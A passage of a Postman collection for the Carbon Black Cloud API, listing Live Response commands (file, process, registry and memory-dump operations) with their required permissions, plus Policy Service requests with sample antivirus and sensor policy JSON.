DELETE</td>\n</tr>\n<tr>\n<td>org.liveresponse.memdump</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#issue-command\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","commands"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"548bfa03-7bfa-400d-83c4-24b25bcf11e1","name":"Directory List","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"directory list\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"b427a897-4991-420a-8526-eaf4b4d48c5e","name":"Process List","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"process list\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"599f2614-caea-49b5-b9ac-fdc3b1fbe833","name":"Create Process","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"create process\",\n  \"path\": \"<string>\",\n  \"output_file\": \"<string>\",\n  \"wait\": boolean\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"8a832a32-d2a1-45af-b4d1-ab993eb92565","name":"Kill Process","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"kill\",\n  \"pid\": integer\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"66fe165d-ba9f-480a-b280-09f04c38dc2e","name":"Delete File","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"delete file\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"2c63efac-115b-4f00-a1c3-9dbf85f11db1","name":"Get File","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"get file\",\n  \"path\": \"<string>\",\n  \"offset\": integer,\n  \"count\": integer\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"65d7e513-6513-4747-b879-acfcc2839131","name":"Put File","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"put file\",\n  \"path\": \"<string>\",\n  \"file_id\": integer\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"0bbc20e2-8bd6-4070-936a-28b9f1098802","name":"Create Directory","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"create directory\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"2d0824ca-f4d2-45f7-9361-d81ec5c86307","name":"Create Registry Key","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"reg create key\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"5804b4c8-afaa-46f9-a61d-50a2ef2f7903","name":"Delete Registry Key","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"reg delete key\",\n  \"path\": \"\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"3c80de2e-3751-4b1c-b60c-a5cd77945d97","name":"Enum Registry Key","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"reg enum key\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"b9d1b045-373f-4644-ac16-4c37a00b7e68","name":"Query Registry Value","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"reg query value\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"9bc5b457-990e-4a57-af9b-5718f09a1dd8","name":"Set Registry Value","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"reg set value\",\n  \"path\": \"<string>\",\n  \"value_data\": \"<string>\",\n  \"value_type\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"df0314be-11ad-4973-9cbb-6190b72e78e6","name":"Delete Registry Value","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"reg delete value\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"96b76ee1-de3c-4906-87c1-1c3358634420","name":"Memdump","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"name\": \"memdump\",\n  \"path\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""}],"_postman_id":"87e36a2e-d475-4907-95ac-e0c04813a048"},{"name":"Retrieve Command","id":"87979b3a-9e5c-4a84-abfc-ca4b883e92d0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands/{{cb_lr_command_id}}","description":"<p>Retrieve Live Response Command Status</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.session</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.liveresponse.process</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.liveresponse.registry</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.liveresponse.file</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.liveresponse.memdump</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#retrieve-command\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","commands","{{cb_lr_command_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"87979b3a-9e5c-4a84-abfc-ca4b883e92d0"},{"name":"Retrieve Command Copy","id":"3df15192-4788-4ff0-91e8-5a69c55b06a7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/liveresponse/sessions/{{cb_lr_session_id}}/commands/{{cb_lr_command_id}}","description":"<p>Cancel Live Response Command</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.liveresponse.process</td>\n<td>DELETE</td>\n</tr>\n<tr>\n<td>org.liveresponse.registry</td>\n<td>DELETE</td>\n</tr>\n<tr>\n<td>org.liveresponse.file</td>\n<td>DELETE</td>\n</tr>\n<tr>\n<td>org.liveresponse.memdump</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/live-response-api/#cancel-command\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","liveresponse","sessions","{{cb_lr_session_id}}","commands","{{cb_lr_command_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3df15192-4788-4ff0-91e8-5a69c55b06a7"}],"id":"b2534922-9ffe-41fa-a4f2-1d120e4edc99","_postman_id":"b2534922-9ffe-41fa-a4f2-1d120e4edc99","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Policy Service API","item":[{"name":"Policy Management","item":[{"name":"Create Policy","id":"c3092976-d3c8-4901-86ad-4fbd1472f9b7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"warning":"This is a duplicate header and will be overridden by the X-Auth-Token header generated by Postman.","key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"id\": 4920125,\n    \"name\": \"Standard\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"MEDIUM\",\n    \"position\": -1,\n    \"is_system\": true,\n    \"description\": \"Prevents known malware and reduces false positives. Used as the default policy for all new sensors, unless sensor group criteria is met.\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_delete_known_bad_hashes_delay\": null,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": false,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": true,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": true,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"days\": null,\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": true,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        },\n        {\n            \"id\": 2,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"COMPANY_BLACK_LIST\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        }\n    ],\n    \"managed_detection_response_permissions\": {\n        \"policy_modification\": true,\n        \"quarantine\": true\n    },\n    \"version\": null,\n    \"message\": null,\n    \"rapid_configs\": []\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies","description":"<p>Create a new policy for protecting endpoints and workloads.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ca1c11e9-4683-4a40-bd20-0715bff5cf67","name":"Create Policy","originalRequest":{"method":"POST","header":[{"key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID"}],"body":{"mode":"raw","raw":"{\n    \"id\": 4920125,\n    \"name\": \"Standard\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"MEDIUM\",\n    \"position\": -1,\n    \"is_system\": true,\n    \"description\": \"Prevents known malware and reduces false positives. Used as the default policy for all new sensors, unless sensor group criteria is met.\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_delete_known_bad_hashes_delay\": null,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": false,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": true,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": true,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"days\": null,\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": true,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        },\n        {\n            \"id\": 2,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"COMPANY_BLACK_LIST\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        }\n    ],\n    \"managed_detection_response_permissions\": {\n        \"policy_modification\": true,\n        \"quarantine\": true\n    },\n    \"version\": null,\n    \"message\": null,\n    \"rule_configs\": []\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 4920125,\n    \"name\": \"Standard\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"MEDIUM\",\n    \"position\": -1,\n    \"is_system\": true,\n    \"description\": \"Prevents known malware and reduces false positives. Used as the default policy for all new sensors, unless sensor group criteria is met.\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_delete_known_bad_hashes_delay\": null,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": false,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": true,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": true,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"days\": null,\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": true,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [ \"http://updates2.cdc.carbonblack.io/update2\" ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        },\n        {\n            \"id\": 2,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"COMPANY_BLACK_LIST\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        }\n    ],\n    \"managed_detection_response_permissions\": {\n      \"policy_modification\": true,\n      \"quarantine\": true\n    },\n    \"version\": null,\n    \"message\": null,\n    \"rule_configs\": []\n}"}],"_postman_id":"c3092976-d3c8-4901-86ad-4fbd1472f9b7"},{"name":"Get Policy Summary","id":"5bbfb157-64da-48f6-a395-2b18087d035b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"warning":"This is a duplicate header and will be overridden by the X-Auth-Token header generated by Postman.","key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID","type":"text"}],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/summary","description":"<p>Get an overview of the policies available in the organization</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","summary"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5bbfb157-64da-48f6-a395-2b18087d035b"},{"name":"Get Policy Details","id":"e0a7d32e-0643-4f69-ad5e-815191b3bd16","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"warning":"This is a duplicate header and will be overridden by the X-Auth-Token header generated by Postman.","key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID","type":"text"}],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}","description":"<p>Get a policy’s details by id</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e423b90a-f22d-4698-a16e-e54d83fd7fe8","name":"Get Policy Details - Host-Based Firewall","originalRequest":{"method":"GET","header":[{"key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID"}],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 18 Dec 2023 02:59:23 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Traceid","value":"fa908b17-0be1-4079-a479-b9a63f200189"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": 33259924,\n    \"name\": \"Kylie_SDK_HBFW\",\n    \"org_key\": \"4J9TY56DMZ\",\n    \"priority_level\": \"LOW\",\n    \"position\": -1,\n    \"is_system\": false,\n    \"description\": \"\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_deregister_inactive_vm_workloads_interval_ms\": 0,\n    \"update_time\": 1687556026798,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": true,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": false,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": false,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": false,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"DENY\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"SHOW_UI\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"ENABLE_THREAT_SHARING\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"QUARANTINE_DEVICE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"LOGGING_LEVEL\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"QUARANTINE_DEVICE_MESSAGE\",\n            \"value\": \"Your device has been quarantined. Please contact your administrator.\"\n        },\n        {\n            \"name\": \"SET_SENSOR_MODE\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"SENSOR_RESET\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"BACKGROUND_SCAN\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"POLICY_ACTION_OVERRIDE\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"HELP_MESSAGE\",\n            \"value\": \"\"\n        },\n        {\n            \"name\": \"PRESERVE_SYSTEM_MEMORY_SCAN\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"HASH_MD5\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_LARGE_FILE_READ\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_EXECUTE_ON_NETWORK_DRIVE\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"DELAY_EXECUTE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_NETWORK_DRIVE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"BYPASS_AFTER_LOGIN_MINS\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"BYPASS_AFTER_RESTART_MINS\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"SHOW_FULL_UI\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SECURITY_CENTER_OPT\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"CB_LIVE_RESPONSE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"ALLOW_INLINE_BLOCKING\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"UNINSTALL_CODE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"DEFENSE_OPT_OUT\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"UBS_OPT_IN\",\n            \"value\": \"false\"\n        }\n    ],\n    \"rule_configs\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting 